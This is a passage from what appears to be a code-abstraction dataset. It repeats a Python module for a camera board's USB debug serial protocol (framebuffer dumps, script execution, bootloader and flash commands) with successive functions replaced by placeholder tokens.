4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\ndef save_descriptor(x, y, w, h, path):\n buf = struct.pack('HHHH', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_DESCRIPTOR_SAVE, len(buf)))\n __serial.write(buf)\n\n\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', 
enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\ndef reset():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SYS_RESET, 0))\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef tx_buf(bytes):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF, bytes))\n return __serial.read(bytes)\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\ndef enable_fb(enable):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FB_ENABLE, 4))\n __serial.write(struct.pack('<I', enable))\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\ndef set_timeout(timeout):\n __serial.timeout = timeout\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\ndef fb_dump():\n size = fb_size()\n if not size[0]:\n return None\n if size[2] > 2:\n num_bytes = size[2]\n else:\n num_bytes = size[0] * size[1] * size[2]\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_DUMP,\n num_bytes))\n buff = __serial.read(num_bytes)\n if size[2] == 1:\n y = np.fromstring(buff, dtype=np.uint8)\n buff = np.column_stack((y, y, y))\n elif size[2] == 2:\n arr = np.fromstring(buff, dtype=np.uint16).newbyteorder('S')\n r = (((arr & 63488) >> 11) * 255.0 / 31.0).astype(np.uint8)\n g = (((arr & 2016) >> 5) * 255.0 / 63.0).astype(np.uint8)\n b = (((arr & 31) >> 0) * 255.0 / 31.0).astype(np.uint8)\n buff = np.column_stack((r, g, b))\n else:\n try:\n buff = np.asarray(Image.frombuffer('RGB', size[0:2], buff,\n 'jpeg', 'RGB', ''))\n except Exception as e:\n print('JPEG decode error (%s)' % e)\n return None\n if buff.size != size[0] * size[1] * 3:\n return None\n return size[0], size[1], buff.reshape((size[1], size[0], 3))\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n\n\ndef reset_to_bl():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SYS_RESET_TO_BL, 0))\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n\n\ndef bootloader_start():\n __serial.write(struct.pack('<I', __BOOTLDR_START))\n return struct.unpack('I', __serial.read(4))[0] == __BOOTLDR_START\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\ndef save_template(x, y, w, h, path):\n buf = struct.pack('IIII', x, y, w, h) + path\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TEMPLATE_SAVE,\n len(buf)))\n __serial.write(buf)\n\n\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef arch_str():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_ARCH_STR, 64))\n return __serial.read(64).split('\\x00', 1)[0]\n\n\n<code token>\n",
"<import token>\n<assignment token>\n\n\ndef init(port, baudrate=921600, timeout=0.3):\n global __serial\n __serial = serial.Serial(port, baudrate=baudrate, timeout=timeout)\n\n\ndef disconnect():\n global __serial\n try:\n if __serial:\n __serial.close()\n __serial = None\n except:\n pass\n\n\n<function token>\n\n\ndef fb_size():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FRAME_SIZE,\n __FB_HDR_SIZE))\n return struct.unpack('III', __serial.read(12))\n\n\n<function token>\n\n\ndef exec_script(buf):\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_EXEC,\n len(buf)))\n __serial.write(buf.encode())\n\n\ndef stop_script():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_SCRIPT_STOP, 0))\n\n\ndef script_running():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD,\n __USBDBG_SCRIPT_RUNNING, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef get_attr(attr):\n __serial.write(struct.pack('<BBIh', __USBDBG_CMD, __USBDBG_ATTR_READ, 1,\n attr))\n return __serial.read(1)\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef bootloader_reset():\n __serial.write(struct.pack('<I', __BOOTLDR_RESET))\n\n\ndef flash_erase(sector):\n __serial.write(struct.pack('<II', __BOOTLDR_ERASE, sector))\n\n\n<function token>\n\n\ndef tx_buf_len():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_TX_BUF_LEN, 4))\n return struct.unpack('I', __serial.read(4))[0]\n\n\n<function token>\n\n\ndef fw_version():\n __serial.write(struct.pack('<BBI', __USBDBG_CMD, __USBDBG_FW_VERSION, 12))\n return struct.unpack('III', 